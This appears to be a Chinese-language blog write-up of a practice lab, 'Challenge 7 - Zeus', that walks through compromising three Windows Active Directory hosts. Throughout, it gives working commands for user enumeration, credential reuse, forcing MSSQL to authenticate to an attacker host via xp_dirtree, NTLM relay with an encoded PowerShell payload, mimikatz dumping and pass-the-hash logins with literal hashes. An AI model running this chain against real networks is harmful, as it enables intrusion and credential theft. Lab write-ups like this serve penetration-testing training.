Challenge 7 - Zeus(0)

 Challenge 7 - Zeus(0)


近期又推出了新的 LAB Challenge 7 - Zeus 宙斯,只有三台看來是個 AD 題組

且三台同網段,研判是模擬考試環境三台都對外的 AD 題組



三台都是 Windows



三台都先 Rustscan 掃掃看,└─$ rustscan -a 192.168.116.158 --scripts none --ulimit 5000 | tee rustscan

158 看來是一台 DC



159 看來沒有甚麼



160 看來也沒有甚麼



三台的 snmp 也都沒有效



nmap LDAP Search,└─$ sudo nmap -n -sV -Pn --script ldap-search.nse 192.168.116.158 | tee nmap-ldap-search

 網域名稱 : zeus.corp



LDAP 物件查詢沒有結果,└─$ ldapsearch -v -x -b "DC=zeus,DC=corp" -H "ldap://192.168.116.158" "(objectclass=*)"



使用者枚舉看看,└─$ ./kerbrute_linux_amd64 userenum --dc 192.168.116.158 -d zeus.corp -o kerbrute-user-enum xato-net-10-million-usernames.txt

跑了一段時間只有枚舉到預設的帳號 administrator、guest



SMB 枚舉看看,使用匿名都無法存取,但是帶入 zeus\guest 可以在 .159 發現有個特殊的分享路徑 SQL



smb 連線該資料夾,└─$ smbclient \\\\192.168.116.159\\SQL -U 'zeus\guest'

當中有一個檔案 connection.sql,抓回來到 kali



查看檔案發現一組帳號密碼 zeus.corp\db_user:Password123!



crackmapexec 測試一下是一組有效的憑證,└─$ crackmapexec smb 192.168.116.158-160 -u db_user -p 'Password123!' -d zeus.corp



跑一下 bloodhound,查找 Domain Admin 僅有一個帳號 administrator



Kerberoastable 帳號有兩個,KRBTGT、svc_mssql$



SPN 資訊 MSSQLSvc/DC01.zeus.corp:1433、MSSQLSvc/DC01.zeus.corp



先用 db_user 登入到 MSSQL,└─$ impacket-mssqlclient 'db_user':'Password123!'@192.168.116.158 -windows-auth 



測試 EXECUTE sp_configure 'show advanced options', 1 告知沒有權限

查看相關 DB 沒有有用的資訊,後續使用 xp_dirtree \\192.168.45.181\share; 去存取 kali 的

SMB 服務,然後在 kali 啟動 responder 監聽,└─$ sudo responder -I tun0 --verbose

發現送過來的帳號是 zeus\svc_mssql$ 的 HASH



將 HASH 存好



hashcat 開始破解,└─$ hashcat -m 5600 svc_mssql\$.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

密碼破解不出來


改使用 Relaying Net-NTLMv2

編輯 Powershell oneliner,然後啟用 impacket-ntlmrelayx

└─PS> impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.116.159 -c "powershell -enc JABjA............................GUAKAApAA=="                        



MSSQL 指令再跑一次 xp_dirtree \\192.168.45.181\share;



Responder 進來了然後直接 relay 出去到我們的目標 .159



拿下 .159 了



.159 只有 proof.txt



執行 mimikatz.exe 獲取 administrator NTLM Hash a1fcb4118dfcbf52a53d6299aab57055



測試 impacket-psexec 可以直接登入,└─$ impacket-psexec -hashes :a1fcb4118dfcbf52a53d6299aab57055 administrator@192.168.116.159



獲得另一個帳號 o.foller 的 NTLM HASH decca5b9babc228de4cedeb29a6b9abf



o.foller 進不了 .159 但是 .160 可以進入└─$ impacket-psexec -hashes :decca5b9babc228de4cedeb29a6b9abf 'o.foller'@192.168.116.160



whoami /groups 看了一下是 160 的 administrators 群組成員



一樣沒有 local.txt 僅有 proof.txt



160 mimikatz.exe 獲得 administrator HASH 97db5c87465431b9091d47a58fe76483




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

濫用 Windows 庫文件(Library File)

Challenge 0 - Secura(1)